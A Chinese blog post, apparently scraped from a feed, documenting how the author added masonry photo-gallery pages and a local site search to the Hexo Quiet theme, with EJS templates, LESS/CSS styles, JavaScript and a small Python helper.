    • comments 是否打开评论功能

    逐个输入图像链接是费劲的,可以考虑借助其他工具批量生成这样的信息。

    ​批量生成这样的信息的代码:

    import os

    for file in os.listdir(r'D:\Study\GzBlog-Github\source\_posts\Diary-浙了(二)'):
    print(' ' + r'- {title: "XXX", src: /2024/02/26/Diary-浙了(二)/' + file + '}')

    gallery.ejs

    ​ 在 gallery.ejs 中调用这些变量:

    <%- partial('_partial/header',{name:'galleries'}) %>
    <%- partial('_widget/header_body',{message: page.description ? page.description : theme.headers.galleries.message, icon:theme.headers.galleries.icon, cover: theme.headers.galleries.cover}) %>
    <%- js('js/masonry.pkgd.js') %>
    <%- js('js/imagesloaded.pkgd.js') %>
    <style> *{ box-sizing: border-box; } </style>

    <div class="gallery-content">
    <div class="grid">
    <div class="grid-sizer"></div>
    <% if (page.imgs && page.imgs.length > 0) { %>
    <% page.imgs.forEach(function(item) { %>
    <div class="grid-item">
    <a href="<%- item.src %>"
    title="<%- item.title %>"
    data-src="<%- item.src %>"
    class="fancybox"
    data-fancybox="fancybox-gallery-img"
    rel="article">
    <img src="<%- item.src %>" alt="<%- item.title %>" />
    </a>
    </div>
    <% }) %>
    <% } %>
    </div>
    <div style="width: 100%; height: 20px;"></div>
    <div class="description-container"><span></span></div>
    <div style="width: 100%; height: 20px;"></div>
    <div id="gitalk-container"></div>
    </div>

    <script>var lazyLoad = <%= theme.lazyload %></script>
    <%- js('js/gallery.js') %>

    gallery.less

​ 同理,创建并编写对应的 gallery.less 如下:

    .gallery-content {
    width: 100%;
    padding: 2px 0;
    max-width: 1200px;
    margin: -64px auto auto auto;
    border-radius: 10px;
    background: #FFF;

    .grid:after {
    content: '';
    display: block;
    clear: both;
    }

    .grid-sizer,
    .grid-item {
    width: 33%;
    }

    .grid-item {
    float: left;
    padding: 10px;
    }

    .grid-item img {
    display: block;
    max-width: 100%;
    border-radius: 10px;
    }

    .fancybox:hover {
    z-index: 2;
    transform: scale(1.1);
    }

    .description-container {
    z-index: 2;
    position: sticky;
    width: 100%;
    left: 0;
    right: 0;
    height: 40px;
    bottom: 0;
    background: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(255, 255, 255, 0.9), rgba(255, 255, 255, 0.9), rgba(0, 0, 0, 0));
    text-align: center;
    flex-direction: column;
    align-items: center;

    span {
    font-size: 18px;
    color: #12183A;
    text-shadow: 0 0 10px rgba(128, 128, 128, 0.8);
    position: absolute;
    bottom: 50%;
    left: 50%;
    transform: translate(-50%, 50%);
    }
    }

    // 屏幕宽度较小时(如手机端),只显示一列
    @media screen and (max-width: 660px) {
    .grid-sizer,
    .grid-item {
    width: 100%;
    }
    }
    }

    gallery.js

    function initGallery()

    ​ 因为设置了懒加载,在图片载入完毕的时候需要执行 $grid.masonry(); 以更新布局。

    function initGallery()
    {
    var $grid = $('.grid').masonry({
    itemSelector: '.grid-item',
    percentPosition: true,
    columnWidth: '.grid-sizer'
    });
    if(lazyLoad)
    {
    window.imageLazyLoadSetting = {
    onImageLoaded: function() {
    $grid.masonry();
    }
    };
    }
    else
    {
    // layout Masonry after each image loads
    $grid.imagesLoaded().progress(function() {
    $grid.masonry();
    });
    }
    galleryBottom();
    }

    $(document).ready(function() {
    initGallery();
    });

    function galleryBottom()

​ JavaScript 代码如下:

    • 对于移动端,获取当前屏幕中间的图片 title,显示到底边栏中。
    • 对于电脑端,当鼠标移动到某张图片上时,将对应的 title 显示到底边栏中。
    function galleryBottom(){
    if (/Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent))
    {
    var descriptionContainer = document.querySelector('.description-container span');
    document.addEventListener("scroll", function () {
    var title = getBottomTitle();
    descriptionContainer.textContent = title;
    }, 3000);
    }
    else {
    var galleryContent = document.querySelector('.grid');
    var descriptionContainer = document.querySelector('.description-container span');

    galleryContent.addEventListener('mouseover', function(event) {
    if (event.target.tagName.toLowerCase() === 'img') {
    var title = event.target.getAttribute('alt');
    descriptionContainer.textContent = title;
    }
    });

    galleryContent.addEventListener('mouseout', function(event) {
    if (event.target.tagName.toLowerCase() === 'img') {
    descriptionContainer.textContent = '';
    }
    });
    }

    function getBottomTitle() {
    var elements = document.querySelectorAll('.fancybox');
    var viewportHeight = window.innerHeight;
    var bottomElement = null;
    for (var i = 0; i < elements.length; i++) {
    var rect = elements[i].getBoundingClientRect();

    if (rect.bottom <= viewportHeight && (!bottomElement || rect.bottom > bottomElement.rect.bottom)) {
    bottomElement = {
    element: elements[i],
    rect: rect
    }
    }
    }
    if (bottomElement) {
    return bottomElement.element.title;
    }
    }
    }
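
​ 个人补充:上面移动端分支原本大概是想给 scroll 回调做节流(给 addEventListener 传 3000 做不到这一点),一个真正的节流包装示意如下(throttle 为假设的辅助函数名):

// 简单的时间戳节流:wait 毫秒内最多执行一次 fn
function throttle(fn, wait) {
let last = 0;
return function () {
const now = Date.now();
if (now - last >= wait) {
last = now;
fn.apply(this, arguments);
}
};
}

// 用法示意:
// document.addEventListener('scroll', throttle(function () {
//     descriptionContainer.textContent = getBottomTitle() || '';
// }, 300));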

    演示

    ​ 大功告成,瀑布流相册的演示:

    png

    ​ 真是太棒了!其他功能,再慢慢设计,想到哪写到哪。

    python 辅助

    ​python 辅助生成 gallery 格式的相关信息:

    import os

    for file in os.listdir(r'D:XXX'):
    print(' ' + r'- {title: "XXX", src: /XXX' + file + '}')
    ]]>
    + 前言

    ​ 拍的照片多了,设计一个相册功能便于更直观地展示拍的各种好看的照片😇!


    ​ 参考资料:

    正文

    子链接的创建

    ​ 在 hexo 项目的 source 文件中,新建一个 galleries 文件夹,再在里面放上 index.md(可以使用命令行),

    1
    hexo new page gallery

    ​ 渲染博客的时候就会渲染 /galleries 这个网址,如 相册-Zi-Zi’s Journey

    png

    ​ 同样地,如果在 galleries 里放上其它文件夹,文件夹里再放上 index.md,渲染博客的时候就会再渲染下一级的网址,如:…/…/…/…/galleries/研究生 。

    png

    ​ 继续套娃,套到相册(layout 为 gallery)为止:

    png

    相册的入口

    ​ 设置好了子链接就要设置好入口,一般在主题的 _config.yml 中配置。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    # 导航名称
    menus_title:
    home: 主页
    archives: 统计
    categories: 类别
    tags: 标签
    galleries: 相册
    links: 链接
    about: 关于

    # 导航
    menus:
    home: /
    archives: /archives
    categories: /categories
    tags: /tags
    galleries: /galleries
    links: /links
    about: /about

    ​ 渲染博客,导航栏就多了一项 相册,且点进去能够正确转入 /galleries

    png

    ​ 其它有关页面的参数也设置一下:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    # 每个页面的展示的图标和一句话
    headers:
    home: {
    message: "居然被你找到了这里!",
    icon: "/images/logo.png",
    cover: "#f5f9fd"
    }
    archives: {
    # 这里会替换掉两个变量{ year 年,number 总数 } 当然也可以不写这两个变量
    message: "居然用了 year 年一共才写了 number 篇文章!",
    icon: "/images/archives.svg",
    cover: "#f5f9fd"
    }
    categories: {
    message: "好像也没分几类",
    icon: "/images/categories.svg",
    cover: "#f5f9fd"
    }
    tags: {
    message: "这里是一些展示的标签",
    icon: "/images/tags.svg",
    cover: "#f5f9fd"
    }
    galleries: {
    message: "有趣的相册~(施工中)",
    icon: "/images/galleries.svg",
    cover: "#f5f9fd"
    }
    links: {
    message: "给我读过的学校递一杯卡布奇诺~",
    icon: "/images/links.svg",
    cover: "#f5f9fd"
    }

    ​ 手撸一个风格相近的图标:

    png

    创建相册页面的布局

    ​ 编辑创建的 index.md,头部信息是由 yaml 语法组成的:

    1
    2
    3
    4
    title: 相册
    date: 2023-12-29 09:46:29
    type: galleries
    layout: galleries

    ​ 以自己所用主题为例,这表示这个网页页面布局将使用 galleries 渲染。

    ​ 我设计了两种页面:

    • galleries 用于展示相册
    • gallery 用于展示相册里的图片

    ​ 在主题对应的文件夹里创建 galleries.ejsgallery.ejs,页面就会按照对应的 .ejs 文件渲染:

    png

    galleries 设计

    index.md

    ​ 给使用 layoutgalleriesindex.md 设计变量,这些变量在galleries.ejs 中会以 page.XXX 的形式读取:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    title: 相册
    date: 2023-12-29 09:46:29
    type: galleries
    layout: galleries
    layout_style: block
    comments: false
    galleries:
    - {title: "研究生", description: "Tell me 他乡的困难会不会比它鼓山高?", cover: "/images/gallery_covers/研究生.jpg"}
    - {title: "本科", description: "闽江江水都流向,流向长乐的海……", cover: "/images/gallery_covers/本科.jpg"}
    - {title: "小时候", description: "我让过去的自己只留在,安静的白马河。", cover: "/images/gallery_covers/小时候.jpg"}
    • title 标题
    • date 时间,但在这里我并没用到
    • type 页面属性
    • layout 布局属性
    • layout_style 布局风格,我这里设计了两种风格 blockcard
    • galleries 相册列表,列表里的内容必须符合子文件夹的属性(我没有想到如何自动遍历子文件夹并获取相关参数的办法,只能这手动档了。)
      • title 相册标题
      • description 相册描述
      • cover 相册封面
      • cover_style 我这里没设置,可以控制封面图片的 style
    • comments 是否打开评论功能

    galleries.ejs

    galleries.ejs 的内容参考如下:(修改 galleries.ejs 的内容要重新生成博客才可以重新渲染,如果调试不方便,可以将代码以 <%- partial('_partial/XXX' %> 跳转到其他地方以便于调试)

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    <%- partial('_partial/header',{name:'galleries'}) %>

    <div class="galleries">
    <%- partial('_widget/header_body',{message: page.headers ? page.headers : theme.headers.galleries.message, icon:theme.headers.galleries.icon, cover: theme.headers.galleries.cover}) %>
    <div class="main">
    <div class="post-<%= page.layout_style ? page.layout_style : 'block' %>" id="content">
    <% page.galleries.forEach(function(item) { %>
    <div class="post-<%= page.layout_style ? page.layout_style : 'block' %>-content">
    <a class="img-container" href="<%= item.title %>">
    <div class="photo-frames">
    <img style="<%- item.cover_style || '' %>" src="<%= item.cover ? item.cover : theme.default_cover %>" alt="Cover">
    </div>
    <p class="title"><%= item.title %></p>
    </a>
    <div class="description-container"><p><%= item.description %></p></div>
    </div>
    <% }); %>
    <div id="gitalk-container"></div>
    </div>
    </div>
    </div>

    ​ 就是将读取到信息展示在页面上的逻辑。

    galleries.less

    ​ 创建并编写对应的 galleries.less 如下(记得在一个地方引用):

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    107
    108
    109
    110
    111
    112
    113
    114
    115
    116
    117
    118
    119
    120
    121
    122
    123
    124
    125
    126
    127
    128
    129
    130
    131
    132
    133
    134
    135
    136
    137
    138
    139
    140
    141
    142
    143
    144
    145
    146
    147
    148
    149
    150
    151
    152
    153
    154
    155
    156
    157
    158
    159
    160
    161
    162
    163
    164
    165
    166
    167
    168
    169
    170
    171
    172
    173
    174
    175
    176
    177
    178
    179
    180
    181
    182
    183
    184
    185
    186
    187
    188
    .galleries{
    .main {
    display: flex;
    flex-grow: 1;
    flex-basis: auto;
    flex-direction: column;
    margin-top: -64px;
    .post-block{
    padding: 0 calc((100% - 1160px)/2);
    margin-bottom: 50px;
    &-content{
    margin: 20px 100px 60px 100px;
    text-decoration: none;
    height: 240px;
    justify-content: center; /* 添加此行以实现水平居中对齐 */
    display: grid;
    grid-template-columns: repeat(auto-fit, minmax(200px, 1fr));
    grid-gap: 10px; /* 控制子容器之间的间距 */
    position: relative;
    top: 0px;
    transition: all .5s ease-in-out;
    -moz-transition: all .5s;
    -webkit-transition: all .5s;
    -o-transition: all .5s;
    &:hover {
    top: -15px;
    }
    .img-container{
    justify-content: center;
    display: flex;
    transform: rotate(-5deg);
    transition: transform ease-in-out 0.5s;
    &:hover {
    transform: rotate(-10deg);
    }
    .photo-frames{
    width: 200px;
    border: 10px solid #FFF; /* 相框的边框样式和颜色 */
    border-radius: 5px;
    background: #FFF;
    box-shadow: 0 20px 40px 0 rgba(50,50,50,0.2);
    img{
    border-radius: 2px;
    margin-top: 10px;
    width: 100%;
    height: 75%;
    object-fit: cover;
    }
    }
    }
    .title{
    bottom: 15px;
    position: absolute;
    font-weight: bold;
    text-decoration: none;
    color: @textColorTheme;
    font-size: 22px;
    font-weight: 500;
    }
    .description-container{
    margin-top: 80px;
    p{
    text-indent: 2em;
    font-size: 20px;
    position: absolute;
    }
    }
    }
    @media screen and (max-width:660px) {
    &-content{
    margin: 20px;
    padding: 20px;
    .title{
    bottom: 5%;
    }
    .description-container{
    p{
    font-size: 18px;
    }
    }
    }
    }
    @media screen and (max-width:489px) {
    &-content{
    height: 320px;
    margin-bottom: 40px;
    .img-container{
    .photo-frames{
    width: 60vw;
    }
    }
    .description-container{
    margin-top: 40px;
    }
    }
    }
    }

    .post-card{
    display: flex;
    max-width: 100%;
    padding: 0 calc((100% - 1200px)/2) 40px;
    flex-wrap: wrap;
    justify-content: center;
    align-items: stretch;
    margin-top: -64px;
    &-content{
    margin: 20px 40px 80px 40px;
    text-decoration: none;
    height: 400px;
    justify-content: center; /* 添加此行以实现水平居中对齐 */
    display: grid;
    grid-template-columns: repeat(auto-fit, minmax(200px, 1fr));
    grid-gap: 10px; /* 控制子容器之间的间距 */
    position: relative;
    top: 0px;
    transition: all .5s ease-in-out;
    -moz-transition: all .5s;
    -webkit-transition: all .5s;
    -o-transition: all .5s;
    &:hover {
    top: -15px;
    }
    .img-container{
    justify-content: center;
    display: flex;
    transform: rotate(-5deg);
    transition: transform ease-in-out 0.5s;
    &:hover {
    transform: rotate(-10deg);
    }
    .photo-frames{
    width: 220px;
    border: 10px solid #FFF; /* 相框的边框样式和颜色 */
    border-radius: 5px;
    background: #FFF;
    box-shadow: 0 20px 40px 0 rgba(50,50,50,0.2);
    img{
    border-radius: 2px;
    margin-top: 10px;
    width: 100%;
    height: 75%;
    object-fit: cover;
    }
    }
    }
    .title{
    bottom: 20px;
    position: absolute;
    font-weight: bold;
    text-decoration: none;
    color: @textColorTheme;
    font-size: 22px;
    font-weight: 500;
    }
    .description-container{
    margin-top: 40px;
    p{
    text-indent: 2em;
    font-size: 20px;
    position: absolute;
    }
    }
    }

    @media screen and (max-width:640px) {
    &-content{
    margin: 80px 20px;
    padding: 20px;
    height: 400px;
    .title{
    bottom: 5%;
    }
    .img-container{
    .photo-frames{
    width: 60vw;
    }
    }
    .description-container{
    p{
    font-size: 18px;
    }
    }
    }
    }
    }
    }
    }

    演示

    ​ 大功告成,对应的 block 风格页面:相册-Zi-Zi’s Journey

    png

    \研究生\index.md 的布局:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    title: 研究生
    date: 2023-12-29 14:47:00
    type: galleries
    layout: galleries
    layout_style: card
    headers: 大河之北
    galleries:
    - {title: "福州", description: "WAIYA! 鼓山脚 南门兜 我如鱼得水", cover: "/images/gallery_covers/研究生/福州.jpg"}
    - {title: "保定-春夏", description: "保定没有爱情,只有他蜡笔还不完的饥荒。", cover: "/images/gallery_covers/研究生/保定-春夏.jpg"}
    - {title: "保定-秋冬", description: "雪花飘飘,北风萧萧。", cover: "/images/gallery_covers/研究生/保定-秋冬.jpg"}
    - {title: "石家庄", description: "直到大厦崩塌", cover: "/images/gallery_covers/研究生/石家庄.jpg"}
    - {title: "厦门", description: "再鼓楼润湖里搞涢涢!", cover: "/images/gallery_covers/研究生/厦门.jpg"}
    - {title: "武汉", description: "这辈子又可以见到小迷糊了!", cover: "/images/gallery_covers/研究生/武汉.jpg"}
    - {title: "雄安", description: "千年大计,国家大事。", cover: "/images/gallery_covers/研究生/雄安.jpg"}
    - {title: "天津", description: "天天乐道,津津有味。", cover: "/images/gallery_covers/研究生/天津.jpg"}
    - {title: "正定", description: "太能走了凡哥!", cover: "/images/gallery_covers/研究生/正定.jpg"}

    ​ 对应的 card 风格页面:

    png

    index.md

    ​ 同理,给使用 layoutgalleryindex.md 设计变量,这些变量在gallery.ejs 中会以 page.XXX 的形式读取:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    title: 保定-秋冬
    date: 2023-12-29 14:47:00
    type: gallery
    layout: gallery
    description: 你们南方人的四季是不完整的。——阿杰
    imgs:
    - {title: "积雪的人行道", src: ../../../XXX.jpg}
    - ...
    - {title: "和美保定", src: ../../../XXX.jpg}
    comments: true
    • title 标题

    • date 时间,但在这里我并没用到

    • type 页面属性

    • layout 布局属性

    • description 相册描述

    • imgs 定义的一个图片类(暂且先设计一个变量)

      • title 图片的描述
      • src 对应的 src 地址,可以是绝对地址也可以是相对地址
    • comments 是否打开评论功能

    逐个输入图像链接是费劲的,可以考虑借助其他工具批量生成这样的信息。

    ​批量生成这样的信息的代码:

    1
    2
    3
    4
    import os

    for file in os.listdir(r'D:\Study\GzBlog-Github\source\_posts\Diary-浙了(二)'):
    print(' ' + r'- {title: "XXX", src: /2024/02/26/Diary-浙了(二)/' + file + '}')

    gallery.ejs

    ​ 在 gallery.ejs 中调用这些变量:

    <%- partial('_partial/header',{name:'galleries'}) %>
    <%- partial('_widget/header_body',{message: page.description ? page.description : theme.headers.galleries.message, icon:theme.headers.galleries.icon, cover: theme.headers.galleries.cover}) %>
    <%- js('js/masonry.pkgd.js') %>
    <%- js('js/imagesloaded.pkgd.js') %>
    <style> *{ box-sizing: border-box; } </style>

    <div class="gallery-content">
    <div class="grid">
    <div class="grid-sizer"></div>
    <% if (page.imgs && page.imgs.length > 0) { %>
    <% page.imgs.forEach(function(item) { %>
    <div class="grid-item">
    <a href="<%- item.src %>"
    title="<%- item.title %>"
    data-src="<%- item.src %>"
    class="fancybox"
    data-fancybox="fancybox-gallery-img"
    rel="article">
    <img src="<%- item.src %>" alt="<%- item.title %>" />
    </a>
    </div>
    <% }) %>
    <% } %>
    </div>
    <div style="width: 100%; height: 20px;"></div>
    <div class="description-container"><span></span></div>
    <div style="width: 100%; height: 20px;"></div>
    <div id="gitalk-container"></div>
    </div>

    <script>var lazyLoad = <%= theme.lazyload %></script>
    <%- js('js/gallery.js') %>

    gallery.less

Similarly, create and write the corresponding gallery.less:

    .gallery-content {
    width: 100%;
    padding: 2px 0;
    max-width: 1200px;
    margin: -64px auto auto auto;
    border-radius: 10px;
    background: #FFF;

    .grid:after {
    content: '';
    display: block;
    clear: both;
    }

    .grid-sizer,
    .grid-item {
    width: 33%;
    }

    .grid-item {
    float: left;
    padding: 10px;
    }

    .grid-item img {
    display: block;
    max-width: 100%;
    border-radius: 10px;
    }

    .fancybox:hover {
    z-index: 2;
    transform: scale(1.1);
    }

    .description-container {
    z-index: 2;
    position: sticky;
    width: 100%;
    left: 0;
    right: 0;
    height: 40px;
    bottom: 0;
    background: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(255, 255, 255, 0.9), rgba(255, 255, 255, 0.9), rgba(0, 0, 0, 0));
    text-align: center;
    flex-direction: column;
    align-items: center;

    span {
    font-size: 18px;
    color: #12183A;
    text-shadow: 0 0 10px rgba(128, 128, 128, 0.8);
    position: absolute;
    bottom: 50%;
    left: 50%;
    transform: translate(-50%, 50%);
    }
    }

// on narrow screens (e.g. mobile), show only one column
    @media screen and (max-width: 660px) {
    .grid-sizer,
    .grid-item {
    width: 100%;
    }
    }
    }

    gallery.js

    function initGallery()

Because lazy loading is enabled, $grid.masonry(); must be executed again once the images finish loading, to refresh the layout.

    function initGallery()
    {
    var $grid = $('.grid').masonry({
    itemSelector: '.grid-item',
    percentPosition: true,
    columnWidth: '.grid-sizer'
    });
    if(lazyLoad)
    {
    window.imageLazyLoadSetting = {
    onImageLoaded: function() {
    $grid.masonry();
    }
    };
    }
    else
    {
    // layout Masonry after each image loads
    $grid.imagesLoaded().progress(function() {
    $grid.masonry();
    });
    }
    galleryBottom();
    }

    $(document).ready(function() {
    initGallery();
    });

    function galleryBottom()

The JavaScript works as follows:

• On mobile, take the title of the image nearest the bottom of the viewport and show it in the bottom bar.
• On desktop, when the mouse hovers over an image, show its title in the bottom bar.
    function galleryBottom(){
    if (/Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent))
    {
    var descriptionContainer = document.querySelector('.description-container span');
document.addEventListener("scroll", function () {
var title = getBottomTitle();
descriptionContainer.textContent = title;
}); // addEventListener's third argument is options/useCapture, not a delay
    }
    else {
    var galleryContent = document.querySelector('.grid');
    var descriptionContainer = document.querySelector('.description-container span');

    galleryContent.addEventListener('mouseover', function(event) {
    if (event.target.tagName.toLowerCase() === 'img') {
    var title = event.target.getAttribute('alt');
    descriptionContainer.textContent = title;
    }
    });

    galleryContent.addEventListener('mouseout', function(event) {
    if (event.target.tagName.toLowerCase() === 'img') {
    descriptionContainer.textContent = '';
    }
    });
    }

    function getBottomTitle() {
    var elements = document.querySelectorAll('.fancybox');
    var viewportHeight = window.innerHeight;
    var bottomElement = null;
    for (var i = 0; i < elements.length; i++) {
    var rect = elements[i].getBoundingClientRect();

    if (rect.bottom <= viewportHeight && (!bottomElement || rect.bottom > bottomElement.rect.bottom)) {
    bottomElement = {
    element: elements[i],
    rect: rect
    }
    }
    }
    if (bottomElement) {
    return bottomElement.element.title;
    }
    }
    }

Demo

All done. A demo of the masonry gallery:

(screenshot)

Fantastic! Other features can be designed bit by bit, written up as they come to mind.

Python helper

A Python helper that generates gallery-format entries:

    import os

    for file in os.listdir(r'D:XXX'):
    print(' ' + r'- {title: "XXX", src: /XXX' + file + '}')
Notes on Modifying the Hexo Quiet Theme

Foreword

I really like this Quiet theme's layout: clean and niche. Unfortunately it has far fewer features than mainstream themes like NexT, Butterfly, or Fluid 😇, so I decided to hack on it.

This post records the various features added to the theme.

Main Content

Site Search

The blog rambles on about too many things, so add a site search to make it easier to look up earlier posts.

After installing the hexo-generator-search plugin, hexo g creates ./search.xml under the public folder, aggregating the content of every post.

(screenshot)

Backend (sort of)

Next comes the JS that actually searches the posts. Butterfly already ships a search, but after studying it for a while I couldn't work out how to steal the code... so I found an article that configures search from scratch:

The core is the search.js below, lightly modified:

    // search.js
    // A local search script with the help of hexo-generator-search
    // Copyright (C) 2015
    // Joseph Pan <http://github.com/wzpan>
    // Shuhao Mao <http://github.com/maoshuhao>
    // This library is free software; you can redistribute it and/or modify
    // it under the terms of the GNU Lesser General Public License as
    // published by the Free Software Foundation; either version 2.1 of the
    // License, or (at your option) any later version.
    //
    // This library is distributed in the hope that it will be useful, but
    // WITHOUT ANY WARRANTY; without even the implied warranty of
    // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
    // Lesser General Public License for more details.
    //
    // You should have received a copy of the GNU Lesser General Public
    // License along with this library; if not, write to the Free Software
    // Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
    // 02110-1301 USA

    var searchFunc = function (path, search_id, content_id, match_count_id) {
    $.ajax({
    url: path,
    dataType: "xml",
    success: function (xmlResponse) {
    // get the contents from search data
    var datas = $("entry", xmlResponse).map(function () {
    return {
    title: $("title", this).text(),
    content: $("content", this).text(),
    url: $("url", this).text()
    };
    }).get();
    var $input = document.getElementById(search_id);
    var $resultContent = document.getElementById(content_id);
    $input.addEventListener('input', function () {
    var str = '<ul class=\"search-result-list\">';
    var keywords = this.value.trim().split(/[\s\-]+/); // .toLowerCase().split(/[\s\-]+/);
    $resultContent.innerHTML = "";
    if (this.value.trim().length <= 0) {
    document.getElementById(match_count_id).textContent = "";
    return;
    }
    // perform local searching
    datas.forEach(function (data) {
    var isMatch = true;
    if (!data.title || data.title.trim() === '') {
    data.title = "Untitled";
    }
    var data_title = data.title.trim();//.toLowerCase();
    var data_content = data.content.trim().replace(/<[^>]+>/g, "");//.toLowerCase();
    var data_url = data.url;
    var index_title = -1;
    var index_content = -1;
    var first_occur = -1;
// only match articles with non-empty contents
    if (data_content !== '') {
    keywords.forEach(function (keyword, i) {
    index_title = data_title.indexOf(keyword);
    index_content = data_content.indexOf(keyword);

    if (index_title < 0 && index_content < 0) {
    isMatch = false;
    } else {
    if (index_content < 0) {
    index_content = 0;
    }
    if (i == 0) {
    first_occur = index_content;
    }
    // content_index.push({index_content:index_content, keyword_len:keyword_len});
    }
    });
    } else {
    isMatch = false;
    }
    // show search results
    if (isMatch) {
    str += "<li><a href='" + data_url +
    "' class='search-result-title'>" + data_title + "</a>";
    var content = data.content.trim().replace(/<[^>]+>/g, "");
    if (first_occur >= 0) {
    // cut out 100 characters
    var start = first_occur - 20;
    var end = first_occur + 80;
    if (start < 0) {
    start = 0;
    }
    if (start == 0) {
    end = 100;
    }
    if (end > content.length) {
    end = content.length;
    }
var match_content = content.substring(start, end); // substring, not substr: (start, end) are indices
    // highlight all keywords
    keywords.forEach(function (keyword) {
    var regS = new RegExp(keyword, "gi");
    match_content = match_content.replace(regS,
    "<em class=\"search-keyword\">" +
    keyword + "</em>");
    });
    str += "<p class=\"search-result\">" + match_content +
    "...</p>"
    }
    str += "</li>";
    }
    });
    str += "</ul>";
    if (str.indexOf('<li>') === -1) {
    document.getElementById(match_count_id).textContent = "";
return $resultContent.innerHTML = "<ul><span class='local-search-empty'>没有找到内容,更换下搜索词试试吧~</span></ul>";
    }
    else
    {
    document.getElementById(match_count_id).innerHTML = "匹配到 <b><font size=\"5px\"><font color=\"#424242\">" + str.match(/<li>/g).length + "</font></font></b> 个结果。";
    }
    $resultContent.innerHTML = str;
    });
    }
    });
    }

Roughly: read the query from the input box search_id, search the content fetched from path (./search.xml), then append the matched results as a list into content_id and the match count into match_count_id.

Frontend

search.ejs

OK, that's the backend. Next, write the frontend search.ejs:

    <div class="page-header">
    <div class="search-dialog">
    <span id="local-search" class="local-search local-search-plugin">
    <h2>站内搜索</h2>
    <div class="local-search-input-box">
    <img class="search_icon" src="<%- theme.icon.search %>" />
    <input type="search" placeholder="输入关键字以搜索……" id="local-search-input" class="local-search-input-cls" />
    </div>
    <div id="local-search-result" class="local-search-result-cls"></div>
<hr>
    <p id="local-search-match-count" class="local-search-match-count"></p>
    </span>
    </div>
    <script>
    if ($('.local-search').size()) {
    $.getScript('/js/search.js', function () {
    searchFunc('/search.xml', 'local-search-input', 'local-search-result', 'local-search-match-count')
    })
    }
    </script>
    </div>

search.css

Lay out the styles in search.css:

    .page-header{
    display: flex;
align-items: center; /* vertically center the children */
    }
    .local-search {
    position: relative;
    text-align: left;
    display: grid;
    }
    .local-search-input-box {
    display: flex;
    height: 24px;
    margin: 20px 10px 0 10px;
    padding: 4px 12px;
    border-radius: 20px;
    border: 2px solid #898fa0;
    color: #666;
    font-size: 14px;
align-items: center; /* vertically center the children */
    }
    .local-search-input-cls {
    width: 100%;
    /* margin: 10px 0; */
    color: #12183A;
    font-size: 16px;
    padding-left: 0.6em;
    border: none;
    outline:none;
    }
    a.search-result-title {
    display: flow !important;
    width: auto !important;
    height: auto !important;
    margin-left: 0 !important;
    }
    .local-search-result-cls {
    overflow-y: overlay;
    max-height: calc(80vh - 200px);
    width: 100%;
    margin: 20px 0;
    }
    @media screen and (max-width: 800px) {
    .local-search-result-cls {
    margin: 20px 10px;
    }
    }
    .local-search-empty {
    color: #888;
    line-height: 44px;
    text-align: center;
    display: block;
    font-size: 18px;
    font-weight: 400;
    }
    .local-search-result-cls ul {
    min-width: 400px;
    max-width: 900px;
    max-height: 600px;
    min-height: 0;
    height: auto;
    margin: 15px 5px 15px 20px;
    padding-right: 30px;
    }
    @media screen and (max-width: 800px) {
    .local-search-result-cls ul {
    min-width: auto;
    max-width: max-content;
    max-height: 70vh;
    min-height: auto;
padding: 0 10px 10px 10px;
    }
    }
    .local-search-result-cls ul li {
    text-align: left;
    border-bottom: 1px solid #bdb7b7;
    padding-bottom: 10px;
    margin-bottom: 20px;
    line-height: 30px;
    font-weight: 400;
    }
    .local-search-result-cls ul li:last-child {
    border-bottom: none;
    margin-bottom: 0;
    }
    .local-search-result-cls ul li a {
    margin-top: 20px;
    font-size: 18px;
    text-decoration: none;
    transition: all .3s;
    font-weight: bold;
    color: #12183A;
    }
    .local-search-result-cls ul li a:hover {
    text-decoration:underline;
    }
    .local-search-result-cls ul li p {
    margin-top: 10px;
    font-size: 14px;
    max-height: 124px;
    overflow: hidden;
    }
    .local-search-result-cls ul li em.search-keyword {
    color: #00F;
    font-weight:bold;
    font-style: normal;
    }

    .search_icon{
    width: 14px;
    height: 14px;
    }
    .search-dialog {
    display: block;
    padding: 64px 80px 20px 80px;
    width: 100%;
align-items: center; /* vertically center the children */
    margin: 0 0 20px;
    }
    @media screen and (max-width: 800px) {
    .search-dialog {
    box-sizing: border-box;
    top: 0;
    left: 0;
    margin: 0;
    width: 100%;
    height: 100%;
    border-radius: 0;
    padding: 50px 15px 20px 15px;
    }
    }
    .local-search-match-count{
    padding: 20px 20px 0 20px;
    color: #12183A;
    }
    .search-dialog h2{
    display: inline-block;
    width: 100%;
    margin-bottom: 20px;
    color: #424242;
    font-size: 1.7rem;
    }
    .search-close-button:hover {
    filter: brightness(120%);
    }
    #local-search .search-dialog .local-search-box {
    margin: 0 auto;
    max-width: 100%;
    width: 100%;
    }
    .custom-hr, .search-dialog hr {
    position: relative;
    margin: 0 auto;
    border: 1px dashed #bdb7b7;
    width: calc(100% - 4px);
    }
    input[type="search"]::-webkit-search-cancel-button {
